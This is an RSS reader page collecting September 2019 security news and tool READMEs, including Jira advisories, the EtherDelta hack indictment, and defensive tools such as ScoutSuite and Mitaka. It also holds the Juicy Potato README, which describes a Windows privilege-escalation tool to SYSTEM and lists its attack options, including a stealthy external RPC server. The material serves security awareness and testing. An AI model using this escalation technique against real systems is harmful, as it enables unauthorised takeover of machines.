RSS Security

❌ About FreshRSS
There are new available articles, click to refresh the page.
Today — September 22nd 2019Your RSS feeds

ArmourBird CSF - Container Security Framework

By: Unknown

ArmourBird CSF - Container Security Framework is an extensible, modular, API-first framework build for regular security monitoring of docker installations and containers against CIS and other custom security checks.

ArmourBird CSF has a client-server architecture and is thus divided into two components:
a) CSF Client
  • This component is responsible for monitoring the docker installations, containers, and images on target machines
  • In the initial release, it will be checking against Docker CIS benchmark
  • The checks in the CSF client will be configurable and thus will be expanded in future releases and updates
  • It has been build on top of Docker bench for security
b) CSF Server
  • This will be the receiver agent for the security logs generated by the various distributed CSF clients (installed on multiple physical/virtual machines)
  • This will also have a UI sub-component for unified management and dashboard-ing of the various vulnerabilities/issues logged by the CSF Clients
  • This server will also expose APIs that can be used for integrating with other systems
Important Note: The tool is currently in beta mode. Hence the debug flag of django (CSF Server) is enabled and the SQLite is used as DB in the same docker container. Hence, spinning up a new docker container will reset the database.

Architecture Diagram

APIs CSF Server
Issue APIs
POST /issues
GET /issues/{issueId}
  • For listing specific issue with {id}
GET /issues
  • For listing all issues reported by all CSF clients
PUT /issues/{issueId}
  • For updating a specific issue (like for severity, comments, etc.)
DELETE /issues/{issueId}
  • For deleting specific issue
Client APIs
POST /clients
  • For adding a CSF client
GET /clients/{clientId}
  • For listing specific CSF client
GET /clients/
  • For listing all the CSF clients
PUT /clients/{clientId}
  • For updating the CSF client (for e.g. IP addr, etc.)
DELETE /clients/{clientId}
  • For deleting a CSF client from the network
Client Group APIs
POST /clientGroup
  • Adding client to a specific group (for e.g. product1, HRNetwork, product2, etc.)
GET /clientGroup/{groupID}
  • For listing client group details
GET /clientGroup/
  • For listing all client groups
PUT /clientGroup/{groupID}
  • For updating client group
DELETE /clientGroup/{groupId}
  • For deleting client group

CSF client run as a docker container on the compute instances running docker installation. It can be executed using the following command using the docker image hosted on
docker run -it --net host --pid host --userns host --cap-add audit_control \
-v /etc:/etc \
-v /usr/bin/docker-containerd:/usr/bin/docker-containerd \
-v /usr/bin/docker-runc:/usr/bin/docker-runc \
-v /usr/lib/systemd:/usr/lib/systemd \
-v /var/lib:/var/lib \
-v /var/run/docker.sock:/var/run/docker.sock \
--label csf_client \
-d armourbird/csf_client
Make sure to update CSF_CDN environment variable in the above command with the CSF server URL. Once the container is executed, it will start sending issue logs to the CSF server on constant intervals.
CSF server can run as a docker container or natively on a web server on which various CSF clients will be sending data. You can run it on your server using the following command using the docker image hosted on
docker run -p 80:8000 -d armourbird/csf_server
Browse the CSF server via the following links
  • Dashboard: http://< your-domain >/dashboard/
  • APIs: http://< your-domain >/api/

Building Docker Images
Building docker image for CSF Client
git clone
cd csf_client
docker build . -t csf_client
Building docker image for CSF Server
git clone
cd csf_server
docker build . -t csf_server

Sneak Peak

API View




Critical flaws affect Jira Service Desk and Jira Service Desk Data Center

Atlassian released security updates for Jira Service Desk and Jira Service Desk Data Center to address a critical flaw that can lead to information disclosure

Atlassian released security updates to address critical vulnerabilities in Jira Service Desk and Jira Service Desk Data Center. One of the flaw can lead to information disclosure, while another critical vulnerability addressed by Atlassian could allow server-side template injection leading to remote code execution. The Jira Service Desk is a help desk request tracker brought to you by Atlassian that allows companies to easily receive, track, manage, and resolve requests from your team’s customers.

Jira Service Desk

The first vulnerability affecting Service Desk and Service Desk Data Center is a URL path traversal.

The flaw, tracked as CVE-2019-14994, could lead to information disclosure, it could be exploited by anyone with access to the portal, including customers. The vulnerability has been discovered by the security researcher Sam Curry.

Should be publishing a PoC explaining a bug I found in Jira Service Desk sometime here soon – it's a really neat find that mirrors some past work from @orange_8361 😀-

— Sam Curry (zlz) (@samwcyo) September 18, 2019

“Affected JIRA Service Desk versions in CVE-2019-14994 will allow non-application access users – Service Desk Customers to path traverse to see restricted issues in the JIRA instance.” reads the security advisory published by Atlassian.

“This allows Service Desk Customers who normally don’t have access to tickets that are not their own to view details of tickets contained in the XML generated results in all JIRA Service Desk projects.”

An attacker could exploit the flaw to view all issues within all Jira projects contained in the vulnerable installation, including Service Desk projects, Jira Core projects, and Jira Software projects.

The security researchers Satnam Narang of Tenable reported that tens of thousands of installs are exposed online, the IT ticketing application is widely adopted in several sectors including the healthcare, government, education and manufacturing industry.

“According to the advisory, an attacker with access to the web portal can send a specially crafted request to the Jira Service Desk portal to bypass these restrictions and view protected information. In order to exploit the vulnerability, the Customer Permissions settings for who can raise a request must be set to “Anyone can email the service desk or raise a request in the portal,” which may be a common configuration because the other two options limit who can open requests.” reported Tenable. “In addition to viewing protected information within Jira Service Desk, an attacker could also view protected information from Jira Software and Jira Core if the “Browse Project” permission is set to Group – Anyone.”

The vulnerability affect product versions prior 3.9.16, from 3.10.0 before 3.16.8, from 4.0.0 before 4.1.3, from 4.2.0 before 4.2.5, from 4.3.0 before 4.3.4, and version 4.4.0. 

The following versions of Service Desk Server and Service Desk Data Center address the CVE-2019-14994: 3.9.16, 3.16.8, 4.1.3, 4.2.5, 4.3.4, and 4.4.1.

A possible workaround consists of blocking requests to JIRA containing ‘..’ at the reverse proxy or load balance level, or configure JIRA to redirect requests containing ‘..’ to a safe URL. Admins could add the following rule to the “URLwrite” section of “[jira-installation-directory]/atlassian-jira/WEB-INF/urlrewrite.xml”:

    <to type="temporary-redirect">/</to>

The second critical flaw addressed by Atlassian is a Template injection issue in Jira Importers Plugin.

The flaw tracked as CVE-2019-15001 affects version 7.0.10 of Jira Server and Jira Data Center and it could be exploited by remote attackers in the administrators’ group to execute arbitrary code.

“There was a server-side template injection vulnerability in Jira Server and Data Center, in the Jira Importers Plugin (JIM). An attacker with “JIRA Administrators” access can exploit this issue. Successful exploitation of this issue allows an attacker to remotely execute code on systems that run a vulnerable version of Jira Server or Data Center.” reads the security advisory.

The vulnerability was reported by the researcher Daniil Dimitriev, it affects versions of the product start from 7.0.10 and include the following:

  • from 7.0.10 before 7.6.16 (fixed in 7.6.16)
  • from 7.7.0 before 7.13.8 (fixed in 7.13.8)
  • from 8.0.0 before 8.1.3 (fixed in 8.1.3)
  • from 8.2.0 before 8.2.5 (fixed in 8.2.5)
  • from 8.3.0 before 8.3.4 (fixed in 8.3.4) 
  • from 8.4.0 before 8.4.1 (fixed in 8.4.1)

Pierluigi Paganini

(SecurityAffairs – Jira, hacking)

The post Critical flaws affect Jira Service Desk and Jira Service Desk Data Center appeared first on Security Affairs.

Juicy Potato - A Sugared Version Of RottenPotatoNG, With A Bit Of Juice, I.E. Another Local Privilege Escalation Tool, From A Windows Service Accounts To NT AUTHORITY\SYSTEM

By: Unknown

A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM

RottenPotatoNG and its variants leverages the privilege escalation chain based on BITS service having the MiTM listener on and when you have SeImpersonate or SeAssignPrimaryToken privileges. During a Windows build review we found a setup where BITS was intentionally disabled and port 6666 was taken.
We decided to weaponize RottenPotatoNG: Say hello to Juicy Potato.
For the theory, see Rotten Potato - Privilege Escalation from Service Accounts to SYSTEM and follow the chain of links and references.
We discovered that, other than BITS there are a several COM servers we can abuse. They just need to:
  1. be instantiable by the current user, normally a "service user" which has impersonation privileges
  2. implement the IMarshal interface
  3. run as an elevated user (SYSTEM, Administrator, ...)
After some testing we obtained and tested an extensive list of interesting CLSID's on several Windows versions.

Juicy details
JuicyPotato allows you to:
  • Target CLSID
    pick any CLSID you want. Here you can find the list organized by OS.
  • COM Listening port
    define COM listening port you prefer (instead of the marshalled hardcoded 6666)
  • COM Listening IP address
    bind the server on any IP
  • Process creation mode
    depending on the impersonated user's privileges you can choose from:
    • CreateProcessWithToken (needs SeImpersonate)
    • CreateProcessAsUser (needs SeAssignPrimaryToken)
    • both
  • Process to launch
    launch an executable or script if the exploitation succeeds
  • Process Argument
    customize the launched process arguments
  • RPC Server address
    for a stealthy approach you can authenticate to an external RPC server
  • RPC Server port
    useful if you want to authenticate to an external server and firewall is blocking port 135...
  • TEST mode
    mainly for testing purposes, i.e. testing CLSIDs. It creates the DCOM and prints the user of token. See here for testing

JuicyPotato v0.1

Mandatory args:
-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both
-p <program>: program to launch
-l <port>: COM server listen port

Optional args:
-m <ip>: COM server listen address (default
-a <argument>: command line argument to pass to program (default NULL)
-k <ip>: RPC server ip address (default
-n <port>: RPC server listen port (default 135)
-c <{clsid}>: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})
-z only test CLSID and print token's user


Final thoughts
If the user has SeImpersonate or SeAssignPrimaryToken privileges then you are SYSTEM.
It's nearly impossible to prevent the abuse of all these COM Servers. You could think to modify the permissions of these objects via DCOMCNFG but good luck, this is gonna be challenging.
The actual solution is to protect sensitive accounts and applications which run under the * SERVICE accounts. Stopping DCOM would certainly inhibit this exploit but could have a serious impact on the underlying OS.

An automatic build is available. Binaries can be downloaded from the Artifacts section here.
Also available in BlackArch.



Security Affairs newsletter Round 232

A new round of the weekly newsletter arrived! The best news of the week with Security Affairs

Hi folk, let me inform you that I suspended the newsletter service, anyway I’ll continue to provide you a list of published posts every week through the blog.

Once again thank you!

A bug in Instagram exposed user accounts and phone numbers
Delaler Leads, a car dealer marketing firm exposed 198 Million records online
Drone attacks hit two Saudi Arabia Aramco oil plants
A flaw in LastPass password manager leaks credentials from previous site
Astaroth Trojan leverages Facebook and YouTube to avoid detection
Data leak exposes sensitive data of all Ecuador ‘citizens
France and Germany will block Facebooks Libra cryptocurrency
MobiHok RAT, a new Android malware based on old SpyNote RAT
Tor Projects Bug Smash Fund raises $86K in August
Australia is confident that China was behind attack on parliament, political parties
Backup files for Lion Air and parent airlines exposed and exchanged on forums
Experts found 125 new flaws in SOHO routers and NAS devices from multiple vendors
Experts warn of the exposure of thousands of Google Calendars online
Fraudulent purchases of digitals certificates through executive impersonation
Memory corruption flaw in AMD Radeon driver allows VM escape
More than 737 million medical radiological images found on open PACS servers
Skidmap Linux miner leverages kernel-mode rootkits to evade detection
United States government files civil lawsuit against Edward Snowden
At least 1,300 Harbor cloud registry installs open to attack
Emotet is back, it spreads reusing stolen email content
Smominru Botnet continues to rapidly spread worldwide
Commodity Malware Reborn: The AgentTesla Total Oil themed Campaign
Crooks hacked other celebrity Instagram accounts to push scams
Magecart attackers target mobile users of hotel chain booking websites
Two selfie Android adware apps with 1.5M+ downloads removed from Play Store
U.S. taxpayers hit by a phishing campaign delivering the Amadey bot
5 Cybersecurity Trends in the Professional Services Sector
Iran denies successful cyber attacks hit infrastructures of its oil sector
MMD-0063-2019 – Summarize report of three years MalwareMustDie research (Sept 2016-Sept 2019)
One of the hackers behind EtherDelta hack also involved in TalkTalk hack

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 232 appeared first on Security Affairs.

0patch will provide micropatches for Windows 7 and Server 2008 after EoS

With the end-of-life of Windows 7 and Server 2008, their users will no more receive security patches, the only way to remain protected is to trust in micropatches.

On January 14, 2020, support for Window 7, Windows Server 2008 and 2008 R2 will end, this means that users will no longer receive security updates.

In order to address security issued in their operating systems, users can install micropatches provided by third-party researchers.

0Patch platform from ACROS Security announced that it will released micropatches to address security flaws discovered in the Microsoft OSs after their end-on-life.

Micropatches are usually small stub of code that addresses security flaws in software products.

“Once we have a POC and know how the vulnerability was fixed by the people who know the vulnerable code best (i.e., Microsoft developers), we’ll port their fix, functionally speaking, as a series of micropatches to the vulnerable code in Windows 7 and Windows Server 2008, and test them against the POC.” reads the post published by 0Patch. “After additional side-effect testing we‘ll publish the micropatches and have them delivered to users’ online machines within 60 minutes.”

The experts at 0Patch will review Microsoft’s security advisories to determine which flaws could affect Windows versions that reached the EOF. Then they will provide micropatches for most critical ones.

0Patch researchers will provide micropatches for critical and easy exploitable flaws that could be exploited by remote attackers to execute arbitrary code on vulnerable systems.

Of course, the time to release a micropatch depends on the complexity of porting the official patch and the time to get a working proof-of-concept (PoC) code to test the vulnerability.

Micropatches for high-risk flaws will be available to non-paying customers too.

0Patch will provides micro patches for both Windows 7 and Server 2008 for at least one year.

Pierluigi Paganini

(SecurityAffairs – patch management, hacking)

The post 0patch will provide micropatches for Windows 7 and Server 2008 after EoS appeared first on Security Affairs.

Facebook suspends tens of thousands of apps from hundreds of developers

Facebook announced it has suspended tens of thousands of apps as a result of a review of privacy practices launched following the Cambridge Analytica scandal.

In April 2018, Facebook revealed that 87 million users have been affected by the Cambridge Analytica case, much more than 50 million users initially thought. The company allowed to access to the personal data of around 87 million Facebook users without their explicit consent.

After the Cambridge Analytica privacy scandal in 2018, the social network giant launched a review of privacy practices. Facebook’s review of all apps on the platform aimed at determining alleged abuse of user data and violation of its privacy rules.

Now Facebook announced that the suspensions of tens of thousands of apps.

According to vice president of partnerships Ime Archibong, the suspensions are “not necessarily an indication that these apps were posing a threat to people.” Archibong also added that some “did not respond to our request for information.”

Archibong revealed that the review “has addressed millions of apps. Of those, tens of thousands have been suspended for a variety of reasons while we continue to investigate.” In some case Facebook completely banned the apps.

In July, the United States Federal Trade Commission (FTC) has approved a record $5 billion settlement with Facebook over the Cambridge Analytica scandal.

Archibong explained that development teams behind the apps have to annually certify compliance with Facebook policies.

“Any developer that doesn’t go along with these requirements will be held accountable.” concluded Archibong.

Pierluigi Paganini

(SecurityAffairs – social network, privacy)

The post Facebook suspends tens of thousands of apps from hundreds of developers appeared first on Security Affairs.

Yesterday — September 21st 2019Your RSS feeds

ScoutSuite - Multi-Cloud Security Auditing Tool

By: Unknown

Scout Suite is an open source multi-cloud security-auditing tool, which enables security posture assessment of cloud environments. Using the APIs exposed by cloud providers, Scout Suite gathers configuration data for manual inspection and highlights risk areas. Rather than going through dozens of pages on the web consoles, Scout Suite presents a clear view of the attack surface automatically.
Scout Suite is stable and actively maintained, but a number of features and internals may change. As such, please bear with us as we find time to work on, and improve, the tool. Feel free to report a bug with details (please provide console output using the --debug argument), request a new feature, or send a pull request.
The project team can be contacted at

The latest (and final) version of Scout2 can be found in and Further work is not planned for Scout2. Fixes will be implemented in Scout Suite.

The following cloud providers are currently supported/planned:
  • Amazon Web Services
  • Microsoft Azure (beta)
  • Google Cloud Platform
  • Alibaba Cloud (early alpha)
  • Oracle Cloud Infrastructure (early alpha)

Refer to the wiki.


Use of Scout Suite does not require AWS users to complete and submit the AWS Vulnerability / Penetration Testing Request Form. Scout Suite only performs API calls to fetch configuration data and identify security gaps, which is not considered security scanning as it does not impact AWS' network and applications.

Use of Scout Suite does not require Azure users to contact Microsoft to begin testing. The only requirement is that users abide by the Microsoft Cloud Unified Penetration Testing Rules of Engagement.

Google Cloud Platform
Use of Scout Suite does not require GCP users to contact Google to begin testing. The only requirement is that users abide by the Cloud Platform Acceptable Use Policy and the Terms of Service and ensure that tests only affect projects you own (and not other customers' applications).

The following command will provide the list of available command line options:
$ python --help
You can also use this to get help on a specific provider:
$ python PROVIDER --help
For further details, checkout our Wiki pages at
After performing a number of API calls, Scout will create a local HTML report and open it in the default browser.
Also note that the command line will try to infer the argument name if possible when receiving partial switch. For example, this will work and use the selected profile:
$ python aws --profile PROFILE

Assuming you already have your provider's CLI up and running you should have your credentials already set up and be able to run Scout Suite by using one of the following commands. If that is not the case, please consult the wiki page for the provider desired.

Amazon Web Services
$ python aws

$ python azure --cli

Google Cloud Platform
$ python gcp --user-account
Additional information can be found in the wiki.

Iran denies successful cyber attacks hit infrastructures of its oil sector

In the last hours, some western media reported destructive cyber attacks against infrastructures in the Iranian oil sector, but Iran denied it.

Last week drone attacks have hit two major oil facilities run by the state-owned company Aramco in Saudi Arabia, one of them is the Abqaiq site.

Western Governments and Saudi Arabia blamed Iran for the attacks.

Immediately after Saudi Arabia oil attacks, experts speculated an escalation of cyber attacks against Iranian oil infrastructure as retaliation.

Today Iran denied that its oil infrastructure had been successfully hit by a cyber attacks.

“Contrary to Western media claims, investigations done today show no successful cyber attack was made on the country’s oil installations and other crucial infrastructure,” reads a statement published by the government’s cyber security office.

Despite the statement, security experts believe that a cyber offensive against Iranian infrastructure is onoing.

According to NetBlocks, an organization that tracks internet outages, the country suffered limited intermittent disruptions of internet connectivity.

Confirmed: Network data show intermittent disruptions to internet connectivity in #Iran from 6:30 PM UTC amid reports of disruptions and outages affecting online industrial and government platforms; limited impact affecting specific providers; root cause not yet established 📉

— (@netblocks) September 20, 2019

The cause of the outage affecting online industrial and government platforms is not clear, but it could be consistent with a cyber attack.

“Data are consistent with a cyber attack or unplanned technical incident on affected networks as opposed to a purposeful withdrawal or shutdown incident,” it added.

In June, after media reported a cyber offensive launched by the US against Iran, Teheran announced that alleged cyber attack against its infrastructure has ever succeeded.

The Iranian telecommunications minister Mohammad Javad Azari Jahromi labeled the activity against its state as “cyber terrorism — such as Stuxnet — and unilateralism — such as sanctions”.

Pierluigi Paganini

(SecurityAffairs – Iran, hacking)

The post Iran denies successful cyber attacks hit infrastructures of its oil sector appeared first on Security Affairs.

MMD-0063-2019 – Summarize report of three years MalwareMustDie research (Sept 2016-Sept 2019)

Hello, it’s unixfreaxjp here. It has been a while since I wrote our own blog, and it is good to be back. Thank you for your patience for all of this time.

The background

It was after September 2016 when we decided to move our blog and since then I had a lot of fun in learning and experimenting much with “Jekyll” (based on “Poole”) and “BlackDoc”, and I just convert all posts statically into “Markdown” and all syntax highlighter into “Rouge” highlighter with templates coded in “Liquid”, and I was seriously dealing with coding in Ruby on FreeBSD for it. Wasn’t easy, but with help from the team, we did that, and I learned a lot.

Then on posting my research I moved along to try out several platforms, it’s good to actually know that we don’t have to depend only into a platform, and 3 (three) years out there was making us learning a lot about other reliable services in here and there. What me and the mates have learned is, in using any media services, either it’s your own or other’s party ones, they all are having their pro’s and con’s points. And frankly speaking, you won’t know for sure about each one of those con’s unless you go out there and try them yourself.

So, here we are, back to service where we first started to do MalwareMustDie blog. And I found that this environment is nicer than before, thank you Google for doing the hard work in satisfying and securing bloggers. So I just set it up and switched all access to HTTPS and hopefully the dead-links effect are minimum. For those who had problem with broken RSS this effort may be a good news to you. You can still access the MMD (MalwareMustDie) blog under sub-domain of “blog2” with HTTP but I won’t add more posts on those servers and I will minimize its service.

The bad side of all of these adventure is, now I have my research materials scattering around all over the internet during these past three years (smile). Oh yes, the research and its activity is still active as usual, yet now we’re happy that we don’t need to make much voice anymore, the security awareness are blooming..not like we had before in 2012, I am still hanging out with our friends and we’re still on to dissecting malware.. Linux or not.. Intel CPU ones or not, and to be noted: I am still a great fan of radare2 and FreeBSD!

I think some followers may not know what we’ve been doing all of these three years, or maybe they can’t track well our activities on our security research, so I decided to list some links for you to catch up with. Some of those reports are just screenshots with comments (security related pictures really paint thousand words), some are just posts in reddit or others, but all contains important information.
Does this means I am posting analysis blog again? Well, you’re going to find that out too 🙂

Here’s the list of what’s been done during these three years, enjoy:

1. Windows related malware posts

Raccoon stealer infection in the wild

Dissecting on memory post exploitation powershell beacon w/ radare2

Intel POPSS Vulnerability PoC Reversed




“FHAPPI attack” : FreeHosting APT PowerSploit Poison Ivy

2. Linux related malware posts

Honda Car’s Panel’s Rootkit from China




Linux/DDoSTF today

GoARM.Bot + static strip ARM ELF by ChinaZ

Linux/ChinaZ Edition 2


Linux/Haiduc (bruter/memo)






Linux/Mandibule (Process Injector)

So Many Mirai..Mirai on the wall)

Today’s Kaiten and PerlDDoS

Linux/STD bot

Linux/Kaiten (modded ver) in Google clouds

Linux/Qbot or GafGyt Kansas city?

ChinaZ gang is back to shellshock drops Elknot abuses USA networks

3. Mac OSX related malware posts


OSX/MachO-PUP (a quickie)

4. Other malware reports

Webshell/r57shell, and..

I also posted either in VirusTotal comments, or previously posted some on kernelmode(not anymore), or sometimes making several posts or notes in reddit.

5. My talks on security conference

About my presentation of: “Unpacking the non-unpackable” (ELF packers talk) in R2CON2018


I may edit/change my posts to adjust or brush up their contents along with this post on transitioning the services, so there will be addition or changes.

Please stay safe, don’t code/use bad stuff, and enjoy the summary!


Original Post:

Pierluigi Paganini

(SecurityAffairs – MalwareMustDie, malware)

The post MMD-0063-2019 – Summarize report of three years MalwareMustDie research (Sept 2016-Sept 2019) appeared first on Security Affairs.

One of the hackers behind EtherDelta hack also involved in TalkTalk hack

US authorities have indicted two men for hacking the exchange EtherDelta in December 2017, one of them was also accused of TalkTalk hack.

US authorities have indicted two men, Elliot Gunton and Anthony Tyler Nashatka, for hacking the cryptocurrency exchange EtherDelta in 2017.

In December 2017, the popular cryptocurrency exchange EtherDelta was hacked, attackers conducted a DNS attack that allowed to steal at least 308 ETH ($266,789 at the time of the hack) as well as a large number of tokens.

According to ZDNet, one of the suspects, the Briton Elliott Gunton(20) aka “Glubz, was also accused of TalkTalk hack.

The other suspect is Anthony Tyler Nashatka, aka “psycho,” from New York city. The duo hacked the EtherDelta systems using employee data (phone number, email address) purchased on the black market.

“The two, over the course of just a week, went from buying an EtherDelta’s employee phone number off the black market to stealing funds from thousands of EtherDelta users.” reported ZDNet.

Court documents obtained by ZDNet in exclusive refer the employee was Z.C., experts believe he is the EtherDelta’s CEO. Clearly the access to the CEO account allowed the hacker to breach the company.

The employee’s data were acquired by Nashatka that asked Gunton to help him in hijacking both EtherDelta’s Cloudflare and Dreamhost accounts.

Six days later, on December 19, 2017. Gunton tricked a mobile telco’s operator into adding a call forwarding number to Coburn’s mobile account.

In this way, any incoming calls were silently forwarded to a Google Voice number operated by the two hackers including two-factor authentication (2FA) messages for the EtherDelta account.

On December 20, the two hackers modified DNS settings in the G Suite portal of EtherDelta and redirected Gmail traffic through a server under their control allowing them to reset the password on EtherDelta’s Cloudflare account. Once gained the access the Cloudflare account they were able to lock out any other employee of the company.

At this point, the duo changed EtherDelta’s DNS records associating the EtherDelta domain to a server under their control that was hosting a copy of the legitimate site used to trick victims into providing their credentials.

The DNS redirection was discovered in a few hours, but it was enough for the hackers to steal more than $800,000 from the accounts of the EtherDelta users.

According to ZDNet, the indictment was filed on August 13, in San Francisco, a few days before Gunton was sentenced to 20 months in prison in the UK. He was also ordered to pay back £407,359 and given a three-and-a-half-year community order, which restricts his internet and software use.

Pierluigi Paganini

(SecurityAffairs – TalkTalk, hacking)

The post One of the hackers behind EtherDelta hack also involved in TalkTalk hack appeared first on Security Affairs.

Mitaka - A Browser Extension For OSINT Search

By: Unknown

Mitaka is a browser extension for OSINT search which can:
  • Extract & refang IoC from a selected block of text.
    • E.g. example[.]com to, test[at] to, hxxp:// to, etc.
  • Search / scan it on various engines.
    • E.g. VirusTotal,, Censys, Shodan, etc.


Supported IOC types
name desc. e.g.
text Freetext any string(s)
ip IPv4 address
domain Domain name
url URL
email Email address
asn ASN AS13335
hash md5 / sha1 / sha256 44d88612fea8a8f36de82e1278abb02f
cve CVE number CVE-2018-11776
btc BTC address 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa
gaPubID Google Adsense Publisher ID pub-9383614236930773
gaTrackID Google Analytics Tracker ID UA-67609351-1

Supported search engines
name url supported types
AbuseIPDB ip url url
BGPView ip / asn
BinaryEdge ip / domain
BitcoinAbuse btc btc
BlockCypher btc
Censys ip / domain / asn / text domain
DNSlytics ip / domain
DomainBigData domain
DomainTools ip / domain
DomainWatch domain / email
EmailRep email
FindSubDomains domain
FOFA ip / domain
FortiGuard ip / url / cve
Google Safe Browsing domain / url
GreyNoise ip / domain / asn
Hashdd ip / domain / hash
HybridAnalysis ip / domain / hash (sha256 only)
Intelligence X ip / domain / url / email / btc
IPinfo ip / asn
IPIP ip / asn
Joe Sandbox hash
MalShare hash
Maltiverse domain / hash
NVD cve
OOCPR email
OTX ip / domain / hash
PubDB gaPubID / gaTrackID
PublicWWW text
Pulsedive ip / domaion / url / hash
RiskIQ ip / domain / email / gaTrackID
SecurityTrails ip / domain / email
Shodan ip / domain / asn
Sploitus cve
SpyOnWeb ip / domain / gaPubID / gaTrackID
Talos ip / domain
ThreatConnect ip / domain / email
ThreatCrowd ip / domain / email
ThreatMiner ip / domain / hash
TIP ip / domain
Urlscan ip / domain / asn / url
ViewDNS ip / domain / email
VirusTotal ip / domain / url / hash
Vulmon cve
VulncodeDB cve
VxCube ip / domain / hash
WebAnalyzer domain
We Leak Info email
X-Force Exchange ip / domain / hash
ZoomEye ip

Supported scan engines
name url supported types
Urlscan ip / domain / url
VirusTotal url


How to use
This browser extension shows context menus based on a type of IoC you selected and then you can choose what you want to search / scan on.


Please set your & VirusTotal API keys in the options page for enabling & VirusTotal scans.

You can enable / disable a search engine on the options page based on your preference.

About Permissons
This browser extension requires the following permissions.
  • Read and change all your data on the websites you visit:
    • This extension creates context menus dynamically based on what you select on a website.
    • It means this extension requires reading all your data on the websites you visit. (This extension doesn't change anything on the websites)
  • Display notifications:
    • This extension makes a notification when something goes wrong.
I don't (and will never) collect any information from the users.

Alternatives or Similar Tools

How to build (for developers)
This browser extension is written in TypeScript and built by webpack.
TypeScript files will start out in src directory, run through the TypeScript compiler, then webpack, and end up in JavaScript files in dist directory.
git clone
cd mitaka
npm install
npm run test
npm run build
For loading an unpacked extension, please follow the procedures described at

Mitaka/見たか means "Have you seen it?" in Japanese.

5 Cybersecurity Trends in the Professional Services Sector

Cybersecurity is an increasingly significant focus for many companies as cyberattacks become more frequent and more costly.

Which are 5 Cybersecurity trends in the professional services sector?

Professional services organizations are especially vulnerable due to the high value of the industry and the data they store — like Social Security numbers, personal financial information and classified business communications.

Employees with non-technical backgrounds or low digital literacy often need access to networks that store highly sensitive data. But these same employees are the most vulnerable to cybercriminals.

The cybersecurity landscape is changing, and every industry will need to adapt. But professional services companies should pay the closest attention to these five trends.

1. Employee Training on Phishing and Digital Security

Hackers aren’t only coders — they’re also social engineers. When the network becomes harder to access, unprepared employees are one of the next best vectors of attack. One in 99 emails is a phishing attack, a fraudulent email designed to look legitimate so an employee will click on a malicious link inside or reply with privileged information.

Employees will need training on digital safety: how to spot phishing emails, and also how to spot bad links and downloads that can be a vector for viruses or other attacks.

2. Hackers Target Mobile Devices

Most phishing happens over email. But hackers can target any device that connects to the internet — including your smartphone. And once a hacker has access to your device, it can be trivial to, for example, intercept and store copies of all the emails you receive. Or use your digital credentials to gain access to confidential information.

IT departments will also need to train employees on the security of personal devices, and — if necessary — restrict what sort of devices can access sensitive data.

3. Ransomware Will Cost Businesses More

Ransomware is a term used to describe viruses that encrypt all the files on a user’s computer and hold them hostage for a fee. Ransomware costs small business an estimated $75 billion each year. And the ransoms continue to get higher and higher.

One major virus — the WannaCry ransomware — nearly shut down the British health care system in 2016. The virus is still infecting computers, even though researchers discovered a killswitch in the virus’ code two years ago.

In 2016, the professional services industry in the United States had a value of $1,100 billion. The industry’s presumed high ability to pay makes it a major target for ransomware.

Cybersecurity professionals need to learn how to respond to this specific kind of attack, and employees need training in digital literacy that will help them identify ransomware attacks and refer them to a security professional.

4. Data Privacy and Data Stewardship Are Becoming High Priorities

New data regulations, like the GDPR in Europe, have made data breaches more costly than ever. Companies who hold on to customer data must take the necessary precautions to defend that data by encrypting the data and restricting access to their network. Companies must also inform customers as soon as possible after a breach — sometimes within just a few days.

Companies, seeing the fines paid by major businesses like Equifax and British Airways, will want to beef up their security in a way that complies with U.S. (and possibly GDPR) regulations. These companies will also want to prepare for the worst-case scenario — how will we know if there has been a breach? And how will we respond?

5. Automation and AI Will Come to Cybersecurity

In cybersecurity, a burnout crisis is looming on the horizon. As demand outstrips the number of cybersecurity professionals on the job market, cybersecurity experts are working longer hours, defending against more threats — and shouldering more of the blame in the case of a breach. Cybercrimes are more common than ever, but the number of people entering cybersecurity hasn’t kept up.

Enterprises, wanting to lighten the burden placed on their IT and cybersecurity teams, are looking for any chance to automate processes.

Cybersecurity platforms that use artificial intelligence to beat digital threats are the latest trend in cybersecurity solutions — even if cybersecurity experts are wary of the technology. Be ready to see AI-based cybersecurity tools to become commonplace in the future, but don’t expect they will make your company invulnerable to attack.

What These Changes Mean for Professional Services

The professional services industry will need to adapt to a changing cybersecurity landscape. As data breaches become more common, businesses will need to make sure their employees can spot suspicious emails and links. And even the most secure company should prepare for the possibility of a data breach.

Cybersecurity is constantly advancing, but so are cybercriminals. Professional services industry will need to stay on top of these trends to keep their information safe.

About the author

Kayla Matthews is a technology and cybersecurity writer, and the owner of To learn more about Kayla and her recent projects, visit her About Me page.

Pierluigi Paganini

(SecurityAffairs – cybersecurity, hacking)

The post 5 Cybersecurity Trends in the Professional Services Sector appeared first on Security Affairs.

Before yesterdayYour RSS feeds

Kirjuri - Web Application For Managing Cases And Physical Forensic Evidence Items

By: Unknown

Kirjuri is a simple php/mysql web application for managing physical forensic evidence items. It is intended to be used as a workflow tool from receiving, booking, note-taking and possibly reporting findings. It simplifies and helps in case management when dealing with a large (or small!) number of devices submitted for forensic analysis. Kirjuri requires PHP7.
See the official Kirjuri home page for more details.

Kirjuri is developed by Antti Kurittu. It was started at the Helsinki Police Department as an internal tool. Original development released under the MIT license. Some components are distributed with their own licenses, please see folders & help for details.


  • Everyone interested is encouraged to submit code and enhancements. If you don't feel confident submitting code, you can submit lanugage files and localized lists of devices etc. These will gladly be accepted.


Two selfie Android adware apps with 1.5M+ downloads removed from Play Store

Experts at Wandera’s threat research team discovered two adware apps on the Google Play Store that were downloaded 1.5M+ times.

Researchers at Wandera discovered two adware selfie filter camera apps on the Google Play that were pushing ads and that can record audio. The bad news is that the two apps were downloaded 1.5M+ times.

The two apps are Sun Pro Beauty Camera (1M+ installs) and Funny Sweet Beauty Selfie Camera (500K installs).

adware SunPro Funny Sweet apps

The researchers discovered that both APKs are packed with a Chinese packer, Ijiami, to prevent their analysis.

The adware pushed by the two malicious app covered the entire display of the Android device. The analysis of the two apps revealed that they required additional permissions such as access to the camera.

The two apps request RECORD_AUDIO permission that allows the app to record audio with the microphone at any moment without the user’s confirmation.

